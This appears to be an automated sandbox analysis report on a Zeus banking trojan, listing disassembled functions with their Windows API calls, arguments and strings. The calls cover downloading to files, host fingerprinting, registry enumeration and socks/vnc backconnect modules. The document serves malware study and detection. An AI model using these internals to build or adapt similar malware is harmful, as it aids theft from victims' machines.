Part of subcall function 003C8A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 003C8A5A
Part of subcall function 003C8A29: FindNextFileW.KERNEL32(00000000,?), ref: 003C8AB5
Part of subcall function 003C8A29: FindClose.KERNEL32(00000000), ref: 003C8AC0
Part of subcall function 003C8A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 003C8ACC
Part of subcall function 003C8A29: RemoveDirectoryW.KERNEL32(?), ref: 003C8AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 003CD39B
CharToOemW.USER32(?,?), ref: 003CD3B7
CharToOemW.USER32(?,?), ref: 003CD3C6

Part of subcall function 003C40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 003C410D

ExitProcess.KERNEL32(00000000), ref: 003CD41C

Part of subcall function 003C4E7B: CharToOemW.USER32(?,?), ref: 003C4EAB
Part of subcall function 003C4E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 003C4F2F

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004151FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041521D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00415267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00415282
FlushFileBuffers.KERNEL32(00000000), ref: 004152A2

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(00000000), ref: 004152B5

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 00417B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00417B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 00417B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00417B72
GetWindowLongW.USER32(?,000000F0), ref: 00417B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417B9D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 003C7B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 003C7B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 003C7B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C7B72
GetWindowLongW.USER32(?,000000F0), ref: 003C7B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7B9D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C85D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 003C85F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 003C8648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8662
CloseHandle.KERNEL32(?), ref: 003C866B

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 00405B1C

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

TlsGetValue.KERNEL32 ref: 00405AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 00405AD4
SaveDC.GDI32(?), ref: 00405AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 00405AF4
RestoreDC.GDI32(?,00000000), ref: 00405B06

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 003B5B1C

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

TlsGetValue.KERNEL32 ref: 003B5AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 003B5AD4
SaveDC.GDI32(?), ref: 003B5AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 003B5AF4
RestoreDC.GDI32(?,00000000), ref: 003B5B06

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(003C8C87,00000000,00000000,00000001,F0000040,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4679
CryptCreateHash.ADVAPI32(003C8C87,00008003,00000000,00000000,00000030,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4691
CryptHashData.ADVAPI32(00000030,00000010,003C8C87,00000000,?,003C8C87), ref: 003C46AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,003C8C87), ref: 003C46C5
CryptDestroyHash.ADVAPI32(00000030,?,003C8C87), ref: 003C46DC
CryptReleaseContext.ADVAPI32(003C8C87,00000000,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C46E6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00406010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0040610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004061E6

Part of subcall function 004070A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 004070CA
Part of subcall function 004070A6: GetNativeSystemInfo.KERNEL32(?), ref: 004070D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00406162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 004061A4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004134BD: GetSystemTime.KERNEL32(?,?,?,?,?,004188CF,000001E6), ref: 004134C7
Part of subcall function 004134BD: SystemTimeToFileTime.KERNEL32(?,004188CF,?,?,?,?,004188CF,000001E6), ref: 004134D5

Part of subcall function 004134E5: GetTimeZoneInformation.KERNEL32(?), ref: 004134F4

Strings

, xrefs: 00406218

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00407125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407138

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 004071C0

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

PathUnquoteSpacesW.SHLWAPI(?), ref: 004071A0
ExpandEnvironmentStringsW.KERNEL32(?,0041D23A,00000104), ref: 004071AD

Strings

.exe, xrefs: 00407147

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B7125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 003B7138

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 003B71C0

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

PathUnquoteSpacesW.SHLWAPI(?), ref: 003B71A0
ExpandEnvironmentStringsW.KERNEL32(?,003CD23A,00000104), ref: 003B71AD

Strings

.exe, xrefs: 003B7147

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040E0FB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
GetThreadDesktop.USER32(00000000), ref: 0040E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

Part of subcall function 0040DD09: TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
Part of subcall function 0040DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
Part of subcall function 0040DD09: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
Part of subcall function 0040DD09: CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
Part of subcall function 0040DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DDF5
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,?), ref: 0040DE56
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DF15
Part of subcall function 0040DD09: CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
Part of subcall function 0040DD09: SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Strings

h(B, xrefs: 0040E15E
N, xrefs: 0040E132

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00414FA6
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00414FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00414FE2
InternetCloseHandle.WININET(00000000), ref: 00414FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00414F97, 00414FA5

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 003C4FA6
InternetSetOptionA.WININET(00000000,00000002,003D200C,00000004), ref: 003C4FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C4FE2
InternetCloseHandle.WININET(00000000), ref: 003C4FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 003C4F97, 003C4FA5

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00415403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 00415414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00415427
FreeLibrary.KERNEL32(?), ref: 00415479

Strings

ObtainUserAgentString, xrefs: 00415421
urlmon.dll, xrefs: 0041540D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C5403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 003C5414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 003C5427
FreeLibrary.KERNEL32(?), ref: 003C5479

Strings

ObtainUserAgentString, xrefs: 003C5421
urlmon.dll, xrefs: 003C540D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041A24F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A265
SetEvent.KERNEL32(?), ref: 0041A286
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A28D

Strings

3, xrefs: 0041A256
$?B, xrefs: 0041A25F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004074BE
lstrcmpiA.KERNEL32(?,vnc), ref: 004074D1

Part of subcall function 00417425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417444
Part of subcall function 00417425: CloseHandle.KERNEL32(?), ref: 00417450

Part of subcall function 00417477: SetLastError.KERNEL32(0000009B,00412AC8,00000000,0040BB5F,00000000,00422AF0,00000000,00000104,76C605D7,00000000), ref: 00417481
Part of subcall function 00417477: CreateThread.KERNEL32(00000000,00422AF0,00422AF0,00422AF0,00000000,00000000), ref: 004174A4

Part of subcall function 0041675E: shutdown.WS2_32(00000000,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(00000000), ref: 0041676D

Part of subcall function 004174BC: WaitForMultipleObjects.KERNEL32(?,00422AEC,00000001,000000FF), ref: 004174CE

CloseHandle.KERNEL32(?), ref: 004076EE

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 00416444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00416463
Part of subcall function 00416444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,00407518,?), ref: 004164B0

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00416774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004167A7

Part of subcall function 0041666B: select.WS2_32(00000000,?,00000000,00000000,?), ref: 004166EA
Part of subcall function 0041666B: WSASetLastError.WS2_32(0000274C), ref: 004166F9

Part of subcall function 0041636E: recv.WS2_32(?,?,00000004,00000000), ref: 00416392

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Strings

vnc, xrefs: 004074CA
socks, xrefs: 004074B7

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 003B74BE
lstrcmpiA.KERNEL32(?,vnc), ref: 003B74D1

Part of subcall function 003C7425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C7444
Part of subcall function 003C7425: CloseHandle.KERNEL32(?), ref: 003C7450

Part of subcall function 003C7477: SetLastError.KERNEL32(0000009B,003C2AC8,00000000,003BBB5F,00000000,003D2AF0,00000000,00000104,76C605D7,00000000), ref: 003C7481
Part of subcall function 003C7477: CreateThread.KERNEL32(00000000,003D2AF0,003D2AF0,003D2AF0,00000000,00000000), ref: 003C74A4

Part of subcall function 003C675E: shutdown.WS2_32(?,00000002), ref: 003C6766
Part of subcall function 003C675E: #3.WS2_32(?), ref: 003C676D

Part of subcall function 003C74BC: WaitForMultipleObjects.KERNEL32(?,003D2AEC,00000001,000000FF), ref: 003C74CE

CloseHandle.KERNEL32(?), ref: 003B76EE

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Part of subcall function 003C6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 003C6463
Part of subcall function 003C6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,003B7518,?), ref: 003C64B0

Part of subcall function 003C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 003C67CC

Part of subcall function 003C6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 003C67A7

Part of subcall function 003C666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 003C66EA
Part of subcall function 003C666B: WSASetLastError.WS2_32(0000274C), ref: 003C66F9

Part of subcall function 003C636E: recv.WS2_32(?,?,00000001,00000000), ref: 003C6392

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

Strings

vnc, xrefs: 003B74CA
socks, xrefs: 003B74B7

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00409D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00409E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00409E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00409ED7

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00417607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00419E26,?,?,?,004175CD,?,?,00000000,00000004,?), ref: 0041761F
Part of subcall function 00417607: RegCloseKey.KERNEL32(?,?,004175CD,?,?,00000000,00000004,?,?,?,?,00419E26,?,?), ref: 0041762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00409F7A
RegCloseKey.ADVAPI32(?), ref: 00409F8D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B9D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 003B9E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 003B9E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 003B9ED7

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,003C9E26,?,?,?,003C75CD,?,?,00000000,00000004,?), ref: 003C761F
Part of subcall function 003C7607: RegCloseKey.KERNEL32(?,?,003C75CD,?,?,00000000,00000004,?,?,?,?,003C9E26,?,?), ref: 003C762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 003B9F7A
RegCloseKey.ADVAPI32(?), ref: 003B9F8D

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

